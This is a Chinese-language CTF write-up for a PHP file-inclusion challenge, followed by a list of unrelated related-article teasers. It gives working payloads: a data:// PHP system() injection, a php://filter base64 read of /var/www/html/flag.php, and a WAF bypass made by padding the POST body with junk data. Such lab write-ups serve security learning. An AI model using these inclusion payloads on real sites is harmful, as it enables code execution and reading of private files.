NSS [鹏城杯 2022]简单包含

news2024/11/26 2:33:30

NSS [鹏城杯 2022]简单包含

看代码觉得不就直接post flag=data://text/plain,<?php system('ls');?>行了。

img

但是事实上没有什么软用。

img

用了php://伪协议之后发现有WAF。

img

可以读源码

img

解码得到

<?php

$path = $_POST["flag"];

if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {

  echo 'nssctf waf!';

} else {

  @include($path);

}
?>
    
<code><span style="color: #000000">

<span style="color: #0000BB"><?php <br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag in /var/www/html/flag.php;</span>

</span>

</code><br />

绕过方法1:

多加脏数据

img

绕过方法2:

换个方法加脏数据

img

这里好奇怪,我postman不行,火狐hackbar可以。是因为火狐hackerbar会自动url编码一次!!!

绕过方法3:

还是脏数据

a=好多个a

&flag=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php

绕过方法4:

日志包含

img

测不出东西。但是可以看报文,是阿帕奇服务器。

img

这里应该是NSS靶场的原因,没开相关权限,不能日志包含。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/722674.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

UE5 MetaHuman SDK插件的使用【一、编辑器创建音波与蓝图创建获取音波,语音与嘴唇口型的同步】

UE5 MetaHuman SDK插件的使用【一、编辑器创建音波与蓝图创建获取音波,语音与嘴唇口型的同步】

目录 打开插件 创建音频 编辑器这直接创建音频&#xff1a; 蓝图中创建和获取音频&#xff1a; 唇语&#xff1a; 声音与嘴唇同步&#xff1a; 方法一【效果不是很好】&#xff1a; 方法二【效果很好&#xff0c;但有一段时间延迟在处理】&#xff1a; 逻辑&#xff1…
阅读更多...
Mysql数据库,Navicat上给表创建索引一直等待

Mysql数据库,Navicat上给表创建索引一直等待

问题背景&#xff1a; 对查询语句进行索引优化&#xff0c;针对以下表添加联合索引&#xff0c;语句如下&#xff1a; ALTER TABLE hzz_patrol_period_config add index IDX_PERIOD_CONFIG_YEAR_TYPE_VAL (EFFECT_YEAR,CHECK_CYCLE_TYPE,CHECK_CYCLE_VAL); Navicat上执行一直…
阅读更多...
linux_driver_day02

linux_driver_day02

作业1 题目&#xff1a; 映射 GPIOE、GPIOF、RCC 虚拟地址&#xff0c;实现控制三盏LED的驱动 效果&#xff1a; 代码&#xff1a; mycdev.h #ifndef _MYCDEV_H_ #define _MYCDEV_H_#include <linux/fs.h> #include <linux/init.h> #include <linux/io.h&g…
阅读更多...
如何使用ChatGPT写好简历?如何使用ChatGPT优化简历?21个写简历的ChatGPT的Prompts!

如何使用ChatGPT写好简历?如何使用ChatGPT优化简历?21个写简历的ChatGPT的Prompts!

你是一位求职者&#xff0c;即将要参加一场面试&#xff0c;你的工作经历是[2年国企会计经验]&#xff0c;教育背景是[国内211本科毕业&#xff0c;会计学专业]&#xff0c;请基于上述内容生成一份简历&#xff0c;要求加上自我评价。 根据这份工作描述写一份[TITLE]的简历。[…
阅读更多...
Python——— 字典

Python——— 字典

&#xff08;一&#xff09;初识字典 字典是 “ 键值对 ” 的无序可变序列&#xff0c;字典中的每个元素都是一个 “ 键值对” &#xff0c;包含&#xff1a; “ 键对象 ” 和 “ 值对象 ” 。可以通过 “ 键对象 ” 实现快速获取、 删除、更新对应的“ 值对象 ” 。 一个典…
阅读更多...
Scala入门学习

Scala入门学习

Scala入门学习 文章目录 Scala入门学习0. 写在前面1. 概述1.1 什么是Scala1.2 Java and Scala 2. Scala简单使用2.1 Scala环境安装2.2 Scala插件安装2.3 Scala第一个案例 0. 写在前面 操作系统&#xff1a;Windows10JDK版本&#xff1a;jdk1.8Maven版本&#xff1a;Maven-3.5.…
阅读更多...
调整图片大小需要注意哪些问题?在线改图片大小的方法介绍

调整图片大小需要注意哪些问题?在线改图片大小的方法介绍

调整图片大小&#xff1a;打造完美尺寸的视觉体验 为什么需要调整图片大小&#xff1f; 在现代社交媒体和网络传媒中&#xff0c;图片已经成为信息传递和内容表达的重要元素。然而&#xff0c;不同平台和设备对于图片尺寸有着各自的要求。过大或过小的图片尺寸可能导致加载速…
阅读更多...
计算机网络_ 1.3 网络核心 (数据交换_电路交换)

计算机网络_ 1.3 网络核心 (数据交换_电路交换)

计算机网络_数据交换_电路交换 计算机网络_数据交换_电路交换 计算机网络_数据交换_电路交换 最典型电路交换网络&#xff1a;电话网络电路交换的三个阶段 建立连接&#xff08;呼叫/电路建立&#xff09;通信释放连接&#xff08;拆除电路&#xff09; 独占资源 电路交换网络…
阅读更多...
OSPFv2基础01_整体介绍

OSPFv2基础01_整体介绍

目录 1.OSPF简介 2.OSPF工作原理简介 3.OSPF基础概念 3.1 OSPF系统 3.1.1 OSPF路由器分类 3.1.2 OSPF区域 &#xff08;1&#xff09;OSPF区域分类 &#xff08;2&#xff09;OSPF特殊区域 3.1.3 OSPF路由类型 3.2 OSPF报文 3.2.1 OSPF首部格式 3.2.2 OSPF报文格式 …
阅读更多...
【软考】数据库理论

【软考】数据库理论

文章目录 一、函数依赖闭包 一、函数依赖闭包 视频连接&#xff1a;https://open.163.com/newview/movie/free?pidEGVFE2HM4&midOGVFE3RKQ 其他的概念&#xff1a; 函数依赖集候选关键字闭包
阅读更多...
Ribbon快速入门

Ribbon快速入门

1.Ribbon 概述 Spring Cloud Ribbon 是一个基于 HTTP 和 TCP 的客户端负载均衡工具&#xff0c;它基于 Netflix Ribbon 实现。通过 Spring Cloud 的封装&#xff0c;可以让我们轻松地将面向服务的 REST 模版请求自动转换成客户端负载均衡的服务调用。 轮询 hash 权重 … 简单…
阅读更多...
机器视觉-镜头、相机、光源选型以及打光

机器视觉-镜头、相机、光源选型以及打光

机器视觉-镜头、相机、光源选型以及打光从理论到实战 关注林中青木微信公众号&#xff0c;获取更多干货&#xff0c;大佬带你飞~
阅读更多...
海睿思分享 | ChatGPT梦幻联动,解锁企业数字化转型新可能

海睿思分享 | ChatGPT梦幻联动,解锁企业数字化转型新可能

在当今这个充满活力和变化的世界里&#xff0c;人工智能 (AI) 的迅速发展正在改变着我们的生活方式。它不仅提高了我们的工作效率&#xff0c;而且正在重新定义我们的日常生活&#xff0c;以前所未有的方式提高了我们的生活质量。其中&#xff0c;以ChatGPT为代表的语言生成模型…
阅读更多...
Golang的数据类型及数据类型间转换整理

Golang的数据类型及数据类型间转换整理

Golang 更明确的数字类型命名&#xff0c;支持 Unicode&#xff0c;支持常用数据结构。 Go 语言中数据类型分为&#xff1a; 基本数据类型 和 复合数据类型 基本数据类型有&#xff1a;整型、浮点型、布尔型、字符串 复合数据类型有&#xff1a; 数组、切片、结构体、函数、m…
阅读更多...
【QT】——定时器QTimer的使用

【QT】——定时器QTimer的使用

目录 常见的函数 构造函数 获取/设置定时器间隔时间 启动/停止定时器 信号 设置定时器的时间的两种方法 设置定时器精度 其他函数 静态函数 实例 QTimer是QT框架中的定时器类型&#xff0c;它的使用方法如下&#xff1a; 定义一个调用QTimer对象&#xff0c;调用st…
阅读更多...
华为OD机试真题 Python 实现【找出通过车辆最多颜色】【2023Q1 100分】,附详细解题思路

华为OD机试真题 Python 实现【找出通过车辆最多颜色】【2023Q1 100分】,附详细解题思路

目录 一、题目描述二、输入描述三、输出描述四、解题思路五、Python算法源码六、效果展示1、输入2、输出3、说明 一、题目描述 在一个狭小的路口&#xff0c;每秒只能通过一辆车&#xff0c;假如车辆的颜色只有3种&#xff0c;找出n秒内经过的最多颜色的车辆数量。 三种颜色编…
阅读更多...
深度学习在Li电池RUL、SOH和电池热管理中的研究进展与应用

深度学习在Li电池RUL、SOH和电池热管理中的研究进展与应用

公众号&#xff1a;尤而小屋作者&#xff1a;Peter编辑&#xff1a;Peter 大家好&#xff0c;我是Peter~ 今天给大家分享一篇关于深度学习在Li电池RUL、SOH和电池热管理中的研究进展与应用的文献综述。文献基本信息介绍&#xff1a; 本文系统介绍了Deep Learning深度学习的不同…
阅读更多...
大厂题第1辑——虚函数七题精讲之3:纯虚函数

大厂题第1辑——虚函数七题精讲之3:纯虚函数

什么是纯虚函数&#xff1f;什么是抽象类&#xff1f;纯虚函数可以提供实现吗&#xff1f;有什么意义&#xff1f; 题6-什么是纯虚函数&#xff1f; C中有两种继承&#xff1a;接口继承和实现继承。二者的第一个区别是&#xff1a;基类都干了些什么&#xff1f; 如果基类啥实…
阅读更多...
15.2 BP神经网络实现图像压缩——基于BP神经网络的图像压缩(matlab程序)

15.2 BP神经网络实现图像压缩——基于BP神经网络的图像压缩(matlab程序)

1.简述 BP神经网络的图像压缩原理 数字图像压缩实际上是以较少的比特数有损或者无损的来表示原来像素矩阵的一种图像处理技术,实际上就是减少图像数据中的时间冗余,空间冗余,频谱冗余等等作为目的,从而同过减少上述的一种或者多种冗余的信息而达到更加高效的存储与传输数据.图…
阅读更多...
目标检测的评估指标

目标检测的评估指标

Precision(精确率/查准率)&#xff1a;是指在所有被预测为正的样本中&#xff0c;确实是正样本的占比。当Precision越大时&#xff0c;FP越小&#xff0c;此时将其他类别预测为本类别的个数也就越少&#xff0c;可以理解为预测出的正例纯度越高。Precision越高&#xff0c;误检…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023